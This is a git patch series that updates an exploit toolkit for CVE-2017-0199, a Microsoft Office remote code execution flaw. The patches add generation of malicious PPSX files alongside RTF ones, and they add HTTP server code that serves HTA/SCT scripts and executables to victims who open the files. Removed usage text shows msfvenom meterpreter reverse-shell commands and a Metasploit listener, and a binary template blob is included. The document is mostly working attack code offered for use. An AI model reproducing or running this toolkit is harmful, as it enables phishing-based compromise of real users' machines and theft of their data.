From 62bee2b11c31f9cacaf699929748af1797386d35 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 13:28:44 +0400 Subject: [PATCH 1/8] Update cve-2017-0199_toolkit.py --- cve-2017-0199_toolkit.py | 407 +++++++++++++++++++++++++++------------ 1 file changed, 288 insertions(+), 119 deletions(-) diff --git a/cve-2017-0199_toolkit.py b/cve-2017-0199_toolkit.py index a7a4e74..872a5dc 100644 --- a/cve-2017-0199_toolkit.py +++ b/cve-2017-0199_toolkit.py @@ -1,88 +1,15 @@ #!/usr/bin/env python ''' - ## Exploit toolkit CVE-2017-0199 - v3.0 (https://github.com/bhdresh/CVE-2017-0199) ## + ## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ## - - -Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. - -### Scenario 1: Deliver local payload - -Example commands - -1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 -2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler - # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe - # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" -3) Start toolkit in exploit mode to deliver local payload - # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe - -### Scenario 2: Deliver Remote payload - -Example commands - -1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 -2) Start toolkit in exploit mode to deliver remote payload - # python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe - - -Scenario 3: Deliver custom HTA file - -Example commands - -1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 -2) Start toolkit in exploit mode to deliver custom HTA file - # python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta - - -### Command line arguments: - - # python cve-2017-0199_toolkit.py -h - - This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE) - - Modes: - - -M gen Generate Malicious RTF file only - - Generate malicious RTF file: - - -w Name of malicious RTF file (Share this file with victim). - - -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. - - For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and - - will be requested once victim will open malicious RTF file. - - -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. - - - - -M exp Start exploitation mode - - Exploitation: - - -H Local path of a custom HTA file which needs to be delivered and executed on target. - NOTE: This option will not deliver payloads specified through options "-e" and "-l". - - -p Local port number. - - -e The path of an executable file / meterpreter shell / payload which needs to be executed on target. - - -l If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload. - - ''' - -import os,sys,thread,socket,sys,getopt,binascii +import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile from random import randint from random import choice from string import ascii_uppercase +from zipfile import ZipFile, ZIP_STORED, ZipInfo + BACKLOG = 50 # how many pending connections queue will hold MAX_DATA_RECV = 999999 # max number of bytes we receive at once @@ -95,38 +22,43 @@ def main(argv): global docuri global payloadurl global payloadlocation - global customhta + global custom global mode global obfuscate + global payloadtype filename = '' docuri = '' payloadurl = '' payloadlocation = '' - customhta = '' + custom = '' port = int("80") host = '' mode = '' obfuscate = int("0") + payloadtype = 'rtf' + # Capture command line arguments try: - opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","customhta=","obfuscate="]) + opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="]) except getopt.GetoptError: print 'Usage: python '+sys.argv[0]+' -h' sys.exit(2) for opt, arg in opts: if opt == '-h': - print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n" + print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n" print "Modes:\n" - print " -M gen Generate Malicious RTF file only\n" - print " Generate malicious RTF file:\n" - print " -w Name of malicious RTF file (Share this file with victim).\n" - print " -u The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n" - print " -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n" - print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n" - print " will be requested once victim will open malicious RTF file.\n" + print " -M gen Generate Malicious file only\n" + print " Generate malicious payload:\n" + print " -w Name of malicious RTF/PPSX file (Share this file with victim).\n" + print " -u The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running.\n" + print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n" + print " will be requested once victim will open malicious RTF/PPSX file.\n" + print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" + print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n" print " -M exp Start exploitation mode\n" print " Exploitation:\n" - print " -H Local path of a custom HTA file which needs to be delivered and executed on target.\n" + print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" + print " -H Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n" print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n" print " -p Local port number.\n" print " -e The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n" @@ -144,10 +76,12 @@ def main(argv): payloadurl = arg elif opt in ("-l", "--payloadlocation"): payloadlocation = arg - elif opt in ("-H","--customhta"): - customhta = arg + elif opt in ("-H","--custom"): + custom = arg elif opt in ("-x","--obfuscate"): obfuscate = int(arg) + elif opt in ("-t","--payloadtype"): + payloadtype = arg if "gen" in mode: if (len(filename)<1): print 'Usage: python '+sys.argv[0]+' -h' @@ -155,33 +89,61 @@ def main(argv): if (len(docuri)<1): print 'Usage: python '+sys.argv[0]+' -h' sys.exit() - if obfuscate == 1: - print "Generating obfuscated RTF file.\n" - generate_exploit_obfuscate_rtf() + if (len(payloadtype)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if payloadtype.upper() == 'RTF': + if obfuscate == 1: + print "Generating obfuscated RTF file.\n" + generate_exploit_obfuscate_rtf() + sys.exit() + if obfuscate == 0: + print "Generating normal RTF payload.\n" + generate_exploit_rtf() + sys.exit() sys.exit() - if obfuscate == 0: - print "Generating normal RTF payload.\n" - generate_exploit_rtf() + if payloadtype.upper() == 'PPSX': + print "Generating normal PPSX payload.\n" + generate_exploit_ppsx() + sys.exit() + if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX': + print 'Usage: python '+sys.argv[0]+' -h' sys.exit() mode = 'Finished' if "exp" in mode: - if (len(customhta)>1): - print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect" - exploitation() - sys.exit() - if (len(payloadurl)<1): + if payloadtype.upper() == 'RTF': + if (len(custom)>1): + print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect" + exploitation_rtf() + sys.exit() + if (len(payloadurl)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(payloadurl)>1 and len(payloadlocation)<1): + print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect" + exploitation_rtf() + sys.exit() + print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect" + exploitation_rtf() + mode = 'Finished' + if payloadtype.upper() == 'PPSX': + if (len(custom)>1): + print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect" + exploitation_ppsx() + sys.exit() + if (len(payloadurl)<1): + print 'Usage: python '+sys.argv[0]+' -h' + sys.exit() + if (len(payloadurl)>1 and len(payloadlocation)<1): + print "Running exploit mode (Deliver SCT with remote payload) - waiting for victim to connect" + exploitation_ppsx() + sys.exit() + print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect" + exploitation_ppsx() + mode = 'Finished' + if not "Finished" in mode: print 'Usage: python '+sys.argv[0]+' -h' sys.exit() - if (len(payloadurl)>1 and len(payloadlocation)<1): - print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect" - exploitation() - sys.exit() - print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect" - exploitation() - mode = 'Finished' - if not "Finished" in mode: - print 'Usage: python '+sys.argv[0]+' -h' - sys.exit() def generate_exploit_rtf(): # Preparing malicious RTF s = docuri @@ -285,8 +247,124 @@ def generate_exploit_obfuscate_rtf(): f.close() print "Generated obfuscated "+filename+" successfully" - -def exploitation(): +def generate_exploit_ppsx(): +# Preparing malicious PPSX + shutil.copy2('template/template.ppsx', filename) + class UpdateableZipFile(ZipFile): + """ + Add delete (via remove_file) and update (via writestr and write methods) + To enable update features use UpdateableZipFile with the 'with statement', + Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates + """ + + class DeleteMarker(object): + pass + + def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False): + # Init base + super(UpdateableZipFile, self).__init__(file, mode=mode, + compression=compression, + allowZip64=allowZip64) + # track file to override in zip + self._replace = {} + # Whether the with statement was called + self._allow_updates = False + + def writestr(self, zinfo_or_arcname, bytes, compress_type=None): + if isinstance(zinfo_or_arcname, ZipInfo): + name = zinfo_or_arcname.filename + else: + name = zinfo_or_arcname + # If the file exits, and needs to be overridden, + # mark the entry, and create a temp-file for it + # we allow this only if the with statement is used + if self._allow_updates and name in self.namelist(): + temp_file = self._replace[name] = self._replace.get(name, + tempfile.TemporaryFile()) + temp_file.write(bytes) + # Otherwise just act normally + else: + super(UpdateableZipFile, self).writestr(zinfo_or_arcname, + bytes, compress_type=compress_type) + + def write(self, filename, arcname=None, compress_type=None): + arcname = arcname or filename + # If the file exits, and needs to be overridden, + # mark the entry, and create a temp-file for it + # we allow this only if the with statement is used + if self._allow_updates and arcname in self.namelist(): + temp_file = self._replace[arcname] = self._replace.get(arcname, + tempfile.TemporaryFile()) + with open(filename, "rb") as source: + shutil.copyfileobj(source, temp_file) + # Otherwise just act normally + else: + super(UpdateableZipFile, self).write(filename, + arcname=arcname, compress_type=compress_type) + + def __enter__(self): + # Allow updates + self._allow_updates = True + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + # call base to close zip file, organically + try: + super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb) + if len(self._replace) > 0: + self._rebuild_zip() + finally: + # In case rebuild zip failed, + # be sure to still release all the temp files + self._close_all_temp_files() + self._allow_updates = False + + def _close_all_temp_files(self): + for temp_file in self._replace.itervalues(): + if hasattr(temp_file, 'close'): + temp_file.close() + + def remove_file(self, path): + self._replace[path] = self.DeleteMarker() + + def _rebuild_zip(self): + tempdir = tempfile.mkdtemp() + try: + temp_zip_path = os.path.join(tempdir, 'new.zip') + with ZipFile(self.filename, 'r') as zip_read: + # Create new zip with assigned properties + with ZipFile(temp_zip_path, 'w', compression=self.compression, + allowZip64=self._allowZip64) as zip_write: + for item in zip_read.infolist(): + # Check if the file should be replaced / or deleted + replacement = self._replace.get(item.filename, None) + # If marked for deletion, do not copy file to new zipfile + if isinstance(replacement, self.DeleteMarker): + del self._replace[item.filename] + continue + # If marked for replacement, copy temp_file, instead of old file + elif replacement is not None: + del self._replace[item.filename] + # Write replacement to archive, + # and then close it (deleting the temp file) + replacement.seek(0) + data = replacement.read() + replacement.close() + else: + data = zip_read.read(item.filename) + zip_write.writestr(item, data) + # Override the archive with the updated one + shutil.move(temp_zip_path, self.filename) + finally: + shutil.rmtree(tempdir) + + with UpdateableZipFile(filename, "a") as o: + o.writestr("ppt/slides/_rels/slide1.xml.rels", "\ + ") + print "Generated "+filename+" successfully" + + +def exploitation_rtf(): print "Server Running on ",host,":",port @@ -334,16 +412,16 @@ def server_thread(conn, client_addr): conn.close() sys.exit(1) # check if custom HTA flag is set - if (len(customhta)>1): + if (len(custom)>1): print "Received request for custom HTA from "+client_addr[0] try: - size = os.path.getsize(customhta) + size = os.path.getsize(custom) except OSError: - print "Unable to read exe - "+customhta + print "Unable to read exe - "+custom conn.close() sys.exit(1) data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n" - with open(customhta) as fin: + with open(custom) as fin: data +=fin.read() conn.send(data) conn.close() @@ -356,7 +434,7 @@ def server_thread(conn, client_addr): try: size = os.path.getsize(payloadlocation) except OSError: - print "Unable to read"+payloadlocation + print "Unable to read "+payloadlocation conn.close() sys.exit(1) data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" @@ -383,5 +461,96 @@ def server_thread(conn, client_addr): sys.exit(1) except socket.error, ex: print ex + + +def exploitation_ppsx(): + + print "Server Running on ",host,":",port + + try: + # create a socket + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + # associate the socket to host and port + s.bind((host, port)) + + # listenning + s.listen(BACKLOG) + + except socket.error, (value, message): + if s: + s.close() + print "Could not open socket:", message + sys.exit(1) + + # get the connection from client + while 1: + conn, client_addr = s.accept() + + # create a thread to handle request + thread.start_new_thread(server_thread, (conn, client_addr)) + + s.close() + +def server_thread(conn, client_addr): + + # get the request from browser + try: + request = conn.recv(MAX_DATA_RECV) + if (len(request) > 0): + # parse the first line + first_line = request.split('\n')[0] + + # get method + method = first_line.split(' ')[0] + # get url + try: + url = first_line.split(' ')[1] + except IndexError: + print "Invalid request from "+client_addr[0] + conn.close() + sys.exit(1) + # check if custom SCT flag is set + if (len(custom)>1): + print "Received request for custom SCT from "+client_addr[0] + try: + size = os.path.getsize(custom) + except OSError: + print "Unable to read custom SCT file - "+custom + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n" + with open(custom) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + conn.close() + sys.exit(1) + check_exe_request = url.find('.exe') + if (check_exe_request > 0): + print "Received request for payload from "+client_addr[0] + try: + size = os.path.getsize(payloadlocation) + except OSError: + print "Unable to read"+payloadlocation + conn.close() + sys.exit(1) + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n" + with open(payloadlocation) as fin: + data +=fin.read() + conn.send(data) + conn.close() + sys.exit(1) + if method in ['GET', 'get']: + print "Received GET method from "+client_addr[0] + data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" + conn.send(data) + conn.close() + sys.exit(1) + except socket.error, ex: + print ex + + if __name__ == '__main__': main(sys.argv[1:]) From a26037caa7692e2ac519da2b213444f8d2cffd84 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 13:29:47 +0400 Subject: [PATCH 2/8] Create 1.txt --- template/1.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 template/1.txt diff --git a/template/1.txt b/template/1.txt new file mode 100644 index 0000000..d00491f --- /dev/null +++ b/template/1.txt @@ -0,0 +1 @@ +1 From f5707f249e2fbdf0dca6338067030a4443711ade Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 14:04:13 +0400 Subject: [PATCH 3/8] Add files via upload --- template/template.ppsx | Bin 0 -> 32790 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 template/template.ppsx diff --git a/template/template.ppsx b/template/template.ppsx new file mode 100644 index 0000000000000000000000000000000000000000..94a432094e8e96190a620a838500db32268fc0e9 GIT binary patch literal 32790 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 